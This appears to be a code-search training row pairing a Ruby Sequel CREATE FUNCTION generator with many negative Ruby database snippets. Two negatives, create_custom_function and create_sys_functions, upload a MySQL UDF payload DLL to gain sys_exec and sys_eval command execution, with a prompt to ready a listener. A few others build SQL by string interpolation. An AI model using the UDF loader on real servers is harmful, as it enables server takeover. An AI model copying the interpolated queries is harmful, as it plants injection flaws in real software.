if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}
returns = opts[:returns] || 'void'
end
language = opts[:language] || 'SQL'
<<-END
CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}
#{"RETURNS #{returns}" if returns}
LANGUAGE #{language}
#{opts[:behavior].to_s.upcase if opts[:behavior]}
#{'STRICT' if opts[:strict]}
#{'SECURITY DEFINER' if opts[:security_definer]}
#{"PARALLEL #{opts[:parallel].to_s.upcase}" if opts[:parallel]}
#{"COST #{opts[:cost]}" if opts[:cost]}
#{"ROWS #{opts[:rows]}" if opts[:rows]}
#{opts[:set].map{|k,v| " SET #{k} = #{v}"}.join("\n") if opts[:set]}
AS #{literal(definition.to_s)}#{", #{literal(opts[:link_symbol].to_s)}" if opts[:link_symbol]}
END
end
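
For context, here is a minimal sketch of how this private SQL generator is normally reached through Sequel's public create_function wrapper; the connection URL and the trigger body are illustrative assumptions, not taken from the source:

    require 'sequel'

    DB = Sequel.connect('postgres://localhost/mydb') # hypothetical database

    # create_function passes its options to create_function_sql above and
    # runs the result, emitting roughly:
    #   CREATE OR REPLACE FUNCTION set_updated_at()
    #   RETURNS trigger
    #   LANGUAGE plpgsql
    #   AS 'BEGIN NEW.updated_at := now(); RETURN NEW; END;'
    DB.create_function(:set_updated_at,
                       'BEGIN NEW.updated_at := now(); RETURN NEW; END;',
                       language: :plpgsql, returns: :trigger, replace: true)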
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
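The objective block above declares a [query, document, negatives] triplet structure. As a hedged illustration (the row layout is assumed from this dump's columns, and document_source and negatives stand in for the code string and the list of code strings shown above), one row expands into training triplets like so:

    # One dataset row, abbreviated.
    row = {
      query: 'SQL statement to create database function.',
      document: document_source,
      negatives: negatives
    }

    # One triplet per negative, matching the declared objective.
    triplets = row[:negatives].map { |neg| [row[:query], row[:document], neg] }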
|
[
"def name\n\t\t\"db_fun\"\n\tend",
"def create_function(name, definition, opts=OPTS)\n self << create_function_sql(name, definition, opts)\n end",
"def function(name, *args)\n SQL::Function.new(name, *args)\n end",
"def create_function(function_name, returning, definition, options = {})\n\n function_name = full_function_name(function_name, options)\n language = options[:language] || 'plpgsql'\n replace = if options[:replace] == false\n ''\n else\n 'OR REPLACE '\n end\n volatility = case options[:volatility]\n when :volatile, :stable, :immutable\n \"\\n #{options[:volatility].to_s.upcase}\"\n else\n \"\"\n end\n\n sql = <<-SQL.gsub(/^[ ]{6}/, \"\")\n CREATE #{replace}FUNCTION #{function_name}\n RETURNS #{returning}\n LANGUAGE #{language}#{volatility}\n AS $function$\n #{definition.strip}\n $function$\n SQL\n\n execute(sql)\n end",
"def function(name, *args)\n SQL::Function.new(function_name(name), *args)\n end",
"def function_sql(f)\n args = f.args\n \"#{f.f}#{args.empty? ? '()' : literal(args)}\"\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def to_create_database_sql(db)\n db.send(:create_database_sql, self.name, {})\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{buffer.parent.table_name.inspect} for selector #{selector.map(&:inspect).join(', ')} and columns #{columns.map(&:inspect).join(', ')}\"\n column_definitions = get_column_definitions\n connection.execute <<-EOS\nCREATE OR REPLACE FUNCTION #{name}(#{column_definitions.map { |c| \"#{c.quoted_input_name} #{c.sql_type} DEFAULT #{c.default || 'NULL'}\" }.join(',') }) RETURNS VOID AS\n$$\nBEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{column_definitions.map { |c| \"#{c.quoted_name} = #{c.quoted_input_name}\" }.join(',')}\n WHERE #{selector.map { |k| \"#{connection.quote_ident(k)} = #{connection.quote_ident([k,'input'].join('_'))}\" }.join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{column_definitions.map { |c| c.quoted_name }.join(',')}) VALUES (#{column_definitions.map { |c| c.quoted_input_name }.join(',')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\nEND;\n$$\nLANGUAGE plpgsql;\nEOS\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def create_custom_function\n # puts \"Creating a custom function to make queries with timestamp as a string...\".cyan\n @session.execute('CREATE OR REPLACE FUNCTION timefstring(somearg text)\n RETURNS NULL ON NULL INPUT\n RETURNS timestamp\n LANGUAGE java\n AS $$\n java.text.SimpleDateFormat formatter = new java.text.SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss.SSS\");\n try {\n Date date = formatter.parse(somearg);\n return date;\n } catch(java.text.ParseException e) {\n return new Date();\n }\n $$')\n end",
"def create_database(name)\n end",
"def functions\n pg_major = ::PgSaurus::Engine.pg_server_version[0]\n res = select_all <<-SQL\n SELECT n.nspname AS \"Schema\",\n p.proname AS \"Name\",\n pg_catalog.pg_get_function_result(p.oid) AS \"Returning\",\n CASE\n WHEN #{pg_major >= 11 ? \"p.prokind = 'w'\" : \"p.proiswindow\"} THEN 'window'\n WHEN p.prorettype = 'pg_catalog.trigger'::pg_catalog.regtype THEN 'trigger'\n ELSE 'normal'\n END AS \"Type\",\n p.oid AS \"Oid\"\n FROM pg_catalog.pg_proc p\n LEFT JOIN pg_catalog.pg_namespace n ON n.oid = p.pronamespace\n WHERE pg_catalog.pg_function_is_visible(p.oid)\n AND n.nspname <> 'pg_catalog'\n AND n.nspname <> 'information_schema'\n AND #{pg_major >= 11 ? \"p.prokind <> 'a'\" : \"p.proisagg <> TRUE\"}\n ORDER BY 1, 2, 3, 4;\n SQL\n res.inject([]) do |buffer, row|\n returning = row['Returning']\n function_type = row['Type']\n oid = row['Oid']\n\n function_str = select_value(\"SELECT pg_get_functiondef(#{oid});\")\n\n name = parse_function_name(function_str)\n language = parse_function_language(function_str)\n definition = parse_function_definition(function_str)\n volatility = parse_function_volatility(function_str)\n\n if definition\n buffer << ::PgSaurus::ConnectionAdapters::FunctionDefinition.new(name,\n returning,\n definition.strip,\n function_type,\n language,\n oid,\n volatility)\n end\n buffer\n end\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def create_genre(db)\r\n create_genre_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS genre(\r\n genre_id INTEGER PRIMARY KEY,\r\n genre_name VARCHAR(255)\r\n )\r\n SQL\r\n #create table genre\r\n db.execute(create_genre_cmd)\r\nend",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def irregular_function_sql(f)\n \"#{f.f}(#{literal(f.arg1)} #{f.joiner} #{literal(f.arg2)})\"\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def create_database\n system \"createdb #{@base_name}\"\n system \"psql -d #{@base_name} -c 'CREATE EXTENSION postgis;'\"\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def signature\n @signature ||= ::Amalgalite::SQLite3::Database::Function.signature( self.name, self.arity )\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def createFunction(code:, name:, isDeterministic: nil) # TESTED\n body = {\n \"code\" => code,\n \"name\" => name,\n \"isDeterministic\" => isDeterministic\n }.delete_if{|k,v| v.nil?}\n request = @@request.merge({ :body => body.to_json })\n result = self.class.post(\"/_db/#{@database}/_api/aqlfunction\", request)\n self.class.return_result result: result\n end",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def create_authors(db)\r\n create_authors_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS authors(\r\n author_id INTEGER PRIMARY KEY,\r\n author_name VARCHAR(255)\r\n )\r\n SQL\r\n #create authors table\r\n db.execute(create_authors_cmd)\r\nend",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def calculate_function(function)\n raise \"invalid function '#{function}'\" unless [:sum, :avg, :min, :max, :count].include?(function.to_sym)\n Sequel::SQL::Function.new(function.to_sym, :value)\n end",
"def table_name; \"gdo_module\"; end",
"def create\n puts \"Creating tumblr\"\n ActiveRecord::Base.connection.execute(File.open(\"db/schema.sql\").read)\n end",
"def oracle; end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def create_table!\n return true unless Fathom.config.uses_sqlite_optimizer\n value = Fathom.config.db.execute(table_creation_sql)\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def create_fund_table\n Bsf::Scraper.db.create_fund_table\n end",
"def update_function(name, options = {})\n version = options[:version]\n sql_definition = options[:sql_definition]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\"\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.function(name: name, version: version).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def [](*args)\n Sequel::SQL::Function.new(self, *args)\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def create(product, price, description, quantity)\n\t@conn.exec(\"INSERT INTO amazone (product, price, description, quantity) VALUES ('#{product}', '#{price}', '#{description}', '#{quantity}');\")\n\tputs \"I added your product to the table.\"\nend",
"def create_book_readers(db)\r\n create_book_readers_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_readers(\r\n reader_id INTEGER PRIMARY KEY,\r\n reader_name VARCHAR(255)\r\n )\r\n SQL\r\n #create the table\r\n db.execute(create_book_readers_cmd)\r\nend",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def make_statement\n end",
"def make_statement\n end",
"def new_test(test_name)\n\tdb.execute(\"CREATE TABLE IF NOT EXISTS #{test_name} (id INTEGER PRIMARY KEY,\n student_first VARCHAR(255),\n student_last VARCHAR(255),\n grade INT\n );\")\nend",
"def create_schema(name)\n sql = %{CREATE SCHEMA \"#{name}\"}\n ActiveRecord::Base.connection.execute sql\n end",
"def create_movies_table\n c = connect\n # this is another way to write a string, using %q{}\n c.exec %q{ \n CREATE TABLE movies (\n id SERIAL PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def create_database(connection_string, db_name)\n create_sql = <<-SQL\n CREATE DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{create_sql}\\\"\"\nend",
"def show_create_table(db, table)\n end",
"def create_function( db, name, args, text, cookie, func, step, final )\n if func || ( step && final )\n cb = CallbackData.new\n cb.proc = cb.proc2 = nil\n cb.data = cookie\n end\n\n if func\n cb.proc = func\n step = final = nil\n elsif step && final\n cb.proc = step\n cb.proc2 = final\n\n func = nil\n end\n\n result = CSSQLite.sqlite3_create_function( db, name, args, text, cb, func, step, final )\n\n # see comments in busy_handler\n if cb\n @callback_data[ name ] = cb\n else\n @callback_data.delete( name )\n end\n\n return result\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def create_regimen(db, name, age, vitamin)\n db.execute(\"INSERT INTO regimen (name, age, vitamin) VALUES (?, ?, ?)\", [name, age, vitamin])\nend",
"def create_functions\n @ddl[:aggregate].each_with_index do |agg, _i|\n output = agg[:args][0]\n\n if contains_output?(output)\n arguments = agg[:args][1]\n format = (arguments.delete(:format) if arguments) || nil\n begin\n @functions << load_function(agg[:function]).new(output, arguments, format, @action)\n rescue Exception => e # rubocop:disable Lint/RescueException\n Log.error(\"Cannot create aggregate function '%s': %s\" % [output, e])\n @failed << {:name => output, :type => :startup}\n end\n else\n Log.error(\"Cannot create aggregate function '%s'. '%s' has not been specified as a valid ddl output.\" % [output, output])\n @failed << {:name => output, :type => :create}\n end\n end\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def sql\n @stmt_api.sql\n end",
"def info_sql\n \"#{INFO_SQL} AND pg_catalog.pg_get_function_arguments(p.oid) = '#{to_s}'\"\n end",
"def sql(options={})\n get_location\n # TODO: validate options\n @params[:sql] = FEATURE_DEFAULTS[:sql].merge(options)\n @params[:sql][:generate] = true\n end",
"def create_db_cmd!\n \"createdb -e #{new_db_name}\"\n end",
"def create_customer(db, first, last, address, city, phone)\n db.execute(\"INSERT INTO customers (first_name, last_name, address, city, phone) VALUES (?, ?, ?, ?, ?)\", [first, last, address, city, phone])\nend",
"def add_to (table_name,title,code)\r\n\t\"INSERT INTO \" + table_name + \r\n\t\"(title,code) VALUES \r\n\t('\" + title + \"','\" + code + \"')\"\r\nend",
"def create(tablename)\n #allow us to pass either a single symbol or an array of symbols.\n if Symbol === tablename\n tablename = [tablename]\n end\n\n tablename.each do |table|\n #standard creation protocol.\n $BS.create table\n\n #here is the reflective magic. Defined below in this list is this thingy.\n $BS.connect {|db| eval \"data_#{table} db\"}\n end\n\n $BS\nend",
"def create!(con)\n con.exec create_stmt\n end",
"def create_book_owners(db)\r\n create_book_owners_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_owners(\r\n owner_id INTEGER PRIMARY KEY,\r\n owner_name VARCHAR(255)\r\n )\r\n SQL\r\n #create book_owners table \r\n db.execute(create_book_owners_cmd)\r\nend",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def create_function( name, arity, type=nil, &block ) # :yields: func, *args\n case type\n when :numeric\n type = SQLite::API::NUMERIC\n when :text\n type = SQLite::API::TEXT\n when :args\n type = SQLite::API::ARGS\n end\n\n callback = proc do |func,*args|\n block.call( FunctionProxy.new( func ), *args )\n end\n\n SQLite::API.create_function( @handle, name, arity, callback )\n SQLite::API.function_type( @handle, name, type ) if type\n\n self\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def create_function(function_name, returning, definition, options = {})\n\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n\n selector_column_definitions = column_definitions.select { |cd| selector_keys.include?(cd.name) }\n setter_column_definitions = column_definitions.select { |cd| setter_keys.include?(cd.name) }\n update_column_definitions = setter_column_definitions.select { |cd| cd.name !~ CREATED_COL_REGEX && !options[\"ignore_on_update\"].include?(cd.name) }\n\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def update_function(name, args)\n version = args[:version]\n sql_definition = args[:sql_definition]\n revert_to_version = args[:revert_to_version]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\",\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.new(\n name: name,\n version: version,\n ).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create_custom_function(dbc, file)\n dll_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir(dbc)\n @udf_dest = plugin_path.chomp + dll_name\n fake_function = 'sys_' + randz(5)\n\n # Upload our UDF DLL Payload file\n if write_bin_file(dbc, file, @udf_dest)\n begin\n puts \"Payload DLL writen to disk\".light_green + \"!\".white\n puts \"Creating function to trigger now\".light_blue + \"....\".white\n puts \"Make sure your listener is ready\".light_yellow + \"....\".white\n sleep(3)\n # Drop function if its already there, then create new\n q = dbc.query(\"DROP FUNCTION IF EXISTS #{fake_function};\")\n q = dbc.query(\"CREATE FUNCTION #{fake_function} RETURNS string SONAME '#{dll_name}';\")\n return fake_function\n rescue Mysql::Error => e\n puts \"Error Triggered, Payload should have also been triggered\".light_green + \"!\".white\n return fake_function\n end\n end\nend",
"def createUserTable\n @Handle.execute( @UserSchema ) \n end",
"def generate(table_name, statement)\n alter_argument = AlterArgument.new(statement)\n dsn = DSN.new(connection_details.database, table_name)\n\n \"#{command} #{all_options} #{dsn} #{alter_argument}\"\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create_sys_functions(dbc)\n udf_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir(dbc)\n @udf_dest = plugin_path.chomp + udf_name\n if @build == 'x64'\n file = './payloads/64/lib_mysqludf_sys.dll'\n elsif @build == 'x32'\n file = './payloads/32/lib_mysqludf_sys.dll'\n end\n\n # Upload our UDF DLL Payload file\n if write_bin_file(dbc, file, @udf_dest)\n begin\n # Drop function if its already there, then create new\n q = dbc.query(\"DROP FUNCTION IF EXISTS sys_exec;\")\n q = dbc.query(\"CREATE FUNCTION sys_exec RETURNS int SONAME '#{udf_name}';\")\n q = dbc.query(\"CREATE FUNCTION sys_eval RETURNS string SONAME '#{udf_name}';\")\n\n # Confirm it was added and all is well....\n if sys_exec_check(dbc)\n return true\n else\n return false\n end\n rescue Mysql::Error => e\n puts \"Problem creating UDF SYS functions\".light_red + \"!\".white\n puts \"\\t=> \".white + \"#{e}\\n\\n\".light_red\n return false\n end\n end\nend",
"def create_recipe(db,name,description,length,difficulty)\n q = \"INSERT INTO recipes (name,description,length,difficulty) VALUES ('#{name}','#{description}',#{length},#{difficulty});\"\n return db.execute(q)\nend",
"def execute sql\n db[sql]\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def add_trigger_and_function(filename, trigger_tables, drop_function=false)\n build_query filename, 'triggers' do |seed, queries|\n queries[0] << %Q!BEGIN;\n CREATE OR REPLACE FUNCTION #{seed['name']}() RETURNS #{seed['function']['return']} AS $$\n BEGIN\n #{seed['function']['sql']}\n END;\n $$ LANGUAGE plpgsql;\n #{Array(trigger_tables).map do |table|\n \"CREATE TRIGGER #{seed['name']} #{seed['trigger']['event'].gsub('<TRIGGERTABLE>', table)} #{seed['trigger']['execute']} #{seed['name']}();\"\n end.join(\"\\n\")}\n COMMIT;!\n queries[1] << Array(trigger_tables).map { |table| \"DROP TRIGGER IF EXISTS #{seed['name']} ON #{table};\\n\" } << (drop_function ? \"DROP FUNCTION IF EXISTS #{seed['name']};\" : '')\n end\n end",
"def create_user(db, first_name, last_name)\n db.execute(\"INSERT INTO users (first_name, last_name) VALUES (?, ?)\", [first_name, last_name])\nend",
"def createTable\n\t\tstm = @db.prepare \"CREATE TABLE IF NOT EXISTS leituras (\n\t\t\t\tIDCLIENTE INT NOT NULL,\n\t\t\t\tIDSENSOR INT NOT NULL,\n\t\t\t\tVALUE INT NOT NULL,\n\t\t\t\tGPSX INT NOT NULL,\n\t\t\t\tGPSY INT NOT NULL,\n\t\t\t\tTIMESTAMP TEXT NOT NULL\n\t\t\t);\"\n\n\t\trs = stm.execute\n\t\trs.close\n\tend",
"def create_sys_functions\n udf_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir\n udf_dest = plugin_path.chomp + udf_name\n if @build == 'x64'\n file = \"#{HOME}extras/myudf/payloads/64/lib_mysqludf_sys.dll\"\n elsif @build == 'x32'\n file = \"#{HOME}extras/myudf/payloads/32/lib_mysqludf_sys.dll\"\n end\n\n # Upload our UDF DLL Payload file\n if udf_write_bin_file(file, udf_dest)\n begin\n # Drop function if its already there, then create new\n q = @db_connection.query(\"DROP FUNCTION IF EXISTS sys_exec;\")\n q = @db_connection.query(\"CREATE FUNCTION sys_exec RETURNS int SONAME '#{udf_name}';\")\n q = @db_connection.query(\"CREATE FUNCTION sys_eval RETURNS string SONAME '#{udf_name}';\")\n\n # Confirm it was added and all is well....\n if sys_exec_check\n return udf_dest\n else\n return nil\n end\n rescue Mysql::Error => e\n print_error(\"Problem creating UDF SYS functions!\")\n puts \"\\t=> \".white + \"#{e}\\n\\n\".light_red\n return nil\n end\n end\n end",
"def executeNoArgs\n db =Rho::Database.new(Rho::Application.databaseFilePath('local'), \"local\");\n \n tableName = Library.getRandomName\n puts \"Table Name #{tableName}\"\n \n db.executeSql(\"CREATE TABLE #{tableName}(x INTEGER, y TEXT)\") \n data = db.isTableExist(tableName)\n \n puts \"#{data}\"\n data\nend",
"def db; end",
"def db; end",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def create_business(database, name, industry)\n database.execute(\"INSERT INTO businesses (name, industry) VALUES (?, ?)\", [name, industry])\nend",
"def create_employee(database, first_name, last_name, wage, title, last_four_ssn, business_id)\n database.execute(\"INSERT INTO employees (first_name, last_name, wage, title, last_four_ssn, business_id) VALUES (?, ?, ?, ?, ?, ?)\", [first_name, last_name, wage, title, last_four_ssn, business_id])\nend",
"def create_schema schema_name\n execute \"CREATE SCHEMA #{quote_schema_name(schema_name)}\"\n end",
